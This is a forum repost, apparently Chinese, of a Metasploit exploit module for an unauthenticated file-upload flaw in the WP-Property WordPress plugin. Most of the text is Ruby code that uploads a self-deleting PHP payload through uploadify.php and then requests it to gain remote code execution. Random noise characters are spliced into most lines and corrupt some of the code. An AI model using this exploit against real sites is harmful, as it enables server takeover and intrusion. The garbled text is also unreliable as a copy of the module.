WordPress WP-Property PHP 文件上传漏洞) g* h1 X5 Z' G5 d) p
. q+ z# i* w1 R3 w: c$ o
## # This file is part of the Metasploit Framework and may be subject to/ E: x. [) t1 E; P& l: F! M. v& I) m
/ G Z3 ?. }/ n. j0 A: u% X# redistribution and commercial restrictions. Please see the Metasploit
# F8 [+ p9 Q; Q9 O
, j, j% L) M) I$ y+ ~! z# Framework web site for more information on licensing and terms of use./ w. A7 J, @0 P8 X9 f7 N: M( V
8 ~4 t% e9 Q, {' U/ C0 S
# http://metasploit.com/framework/ ##9 r3 m! Z9 e; o: G/ ?
: P( z/ N1 B7 L
; R4 Y% [& Q8 S; j3 Y$ d
8 [$ g- N8 v' C, w O/ K
1 R {+ L' y; o! q1 j. y; Y4 Y5 y; m* ~
require 'msf/core'
. G* w$ X& x5 Z0 V% N# i3 H( G; Erequire 'msf/core/exploit/php_exe'
% v. ^8 H+ g7 H3 U) P" S+ {4 D T8 ^3 b @' A: _) @1 G
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',3 {- ~. F; k: X
'Description' => %q{, ]6 H& N. Y, W" t
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
, ^4 F% O6 T( a9 ]- U[
+ t; ~ w, y3 i4 T+ g. u'Sammy FORGIT', # initial discovery& ?9 \+ n: \8 E/ ?: l6 \( b$ |
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
! M7 W/ E) C: O7 `; V: u],
6 C, W- G" V, ]2 |4 m4 h4 h'License' => MSF_LICENSE,
- Y$ U4 M, N1 h2 {'References' =>1 ]: d, }/ @) d. n: a- _
[
; V" N* h3 T; p[ 'OSVDB', '82656' ], a, ~- U" u8 X
[ 'BID', '53787' ],
9 g+ t) ]5 `& H3 B- h* x1 ^[ 'EDB', '18987'],: j" f A: J% s" u
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
* `2 Q3 i( w. f# b2 P/ P],4 X7 v% y3 E) ]
'Payload' =>
. W% A$ E7 R7 X5 r( b% Q{
6 H( p! s0 V5 {6 _'BadChars' => "\x00",/ N& x, d5 I# J
},0 R) y1 q$ @ n& d# N" F8 Y2 y/ _
'Platform' => 'php',
) f7 p7 R# D2 Y0 V1 l$ t$ a'Arch' => ARCH_PHP,7 }5 ^+ w& o3 T H4 o9 t- W, L
'Targets' =>. c! }1 b7 r; f9 K0 ?6 Y" \) _: c" C7 i
[
' }# k/ O2 L2 ], z" h. m[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],* Z# x& l0 ?7 c" z
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
1 x. o6 g" l' P$ k$ y, l],
2 G! F8 c/ Z0 E# y8 _7 y; h'DefaultTarget' => 0,; L+ c% I4 x. c& f% b1 F6 A
'DisclosureDate' => 'Mar 26 2012'))
" w, s* l% n9 q1 {& D. ~# P
+ }3 b# K. V# |8 o! ^register_options(3 e" p& d! O" q- O, e+ l
[
) t$ J' N, a3 r2 V: ~OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
4 a/ B. i" J* }; ]1 k& q], self.class)
3 I* [' r; Q) d: v3 [/ @9 L' Cend
7 z# i$ \% z9 y6 F1 [& ~) w
: y& A9 o; A; _* {' _" r' Udef check: @( I; s z! l8 q) J) n+ Q
uri = target_uri.path
3 X% C0 e" |& f/ x, X/ a4 h$ Guri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
6 X( n% M, r* K8 z'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php" w7 s/ x- u; z3 H, t
})8 j" x* C! s* W) j+ @
1 r! i V) S9 n/ l. a, L
if not res or res.code != 200
3 j1 C; h5 g) |1 G/ n2 {. |+ Kreturn Exploit::CheckCode::Unknown
. j& `' H2 P% o6 n3 \ dend' `. K& q& q2 a" g! H% Q1 u/ k
+ [5 T6 O8 _. f' freturn Exploit::CheckCode::Appears
' Z4 t+ B+ M! S/ V8 t% m4 mend6 K" W" S& C4 Y" n8 m# {- ?
( l* @. a F- \ G1 m8 Q3 A' C' a0 H
def exploit
# V2 _0 N" K/ m7 t9 V& muri = target_uri.path d0 w! t6 u" h$ g t
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
, n8 P8 F1 f4 {( S8 j, h# B- A. b: F
. g# d8 c5 O& l% O, Ydata = Rex::MIME::Message.new% n% J3 b- M4 W7 V1 s
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
) c7 E, C7 L. ] `! x: h# Cdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")' k9 L0 w2 W2 y2 ^
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') h# A! u C) l% q& |$ Z) k
& t! ~- q4 d0 [- l( E* i E S, a8 dprint_status("#{peer} - Uploading payload #{@payload_name}")
0 j8 i& u/ `* W+ q4 F/ K) X9 D) {) Jres = send_request_cgi({
9 V/ n z5 ^8 E'method' => 'POST',
1 g N$ V! J) @* D, F3 H0 W+ ~ }'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
: P, J2 C1 E9 E9 b2 o( ]. n. E8 Q' ]. ]'ctype' => "multipart/form-data; boundary=#{data.bound}",& P1 [1 U# a k5 k9 G( B2 R
'data' => post_data% O, {, W( S3 U7 M7 R2 r- f
})( s$ u( Z1 e G8 y0 O% ^+ @$ W, h
# |* [ D% q4 }4 M" J) aif not res or res.code != 200 or res.body !~ /#{@payload_name}/
. [, H6 Y+ L# r# U/ s K# U# \/ Tfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")0 R8 |$ ?" e$ W" j5 P% s
end5 A" r0 U; J* ?! w. j
1 I2 [, k! G, o7 H6 W
upload_uri = res.body/ ~* c& n4 m# @4 O. c! U
2 n* K' ^4 K# j' K! Q" A: G4 y
print_status("#{peer} - Executing payload #{@payload_name}")
* ~) z, H% X+ g% m% ^0 ^res = send_request_raw({5 I* C: n S* Z
'uri' => upload_uri,
; B: S4 n( C3 p; Q'method' => 'GET'
; y9 W1 ~+ @6 q9 Q+ }})* H. @( V" L- s7 G4 X
end" A! a2 a- ]& t# l9 q) P- E
end
2 a( V* `% \* s) f/ q6 g/ o$ ?2 d# Z0 E c* U0 s! k" a9 t
不要问我这写的是什么 怎么利用 我是说msf.9 q$ O6 { Y! U9 R% c4 \' ]9 r1 F
7 B4 i# b9 z7 E |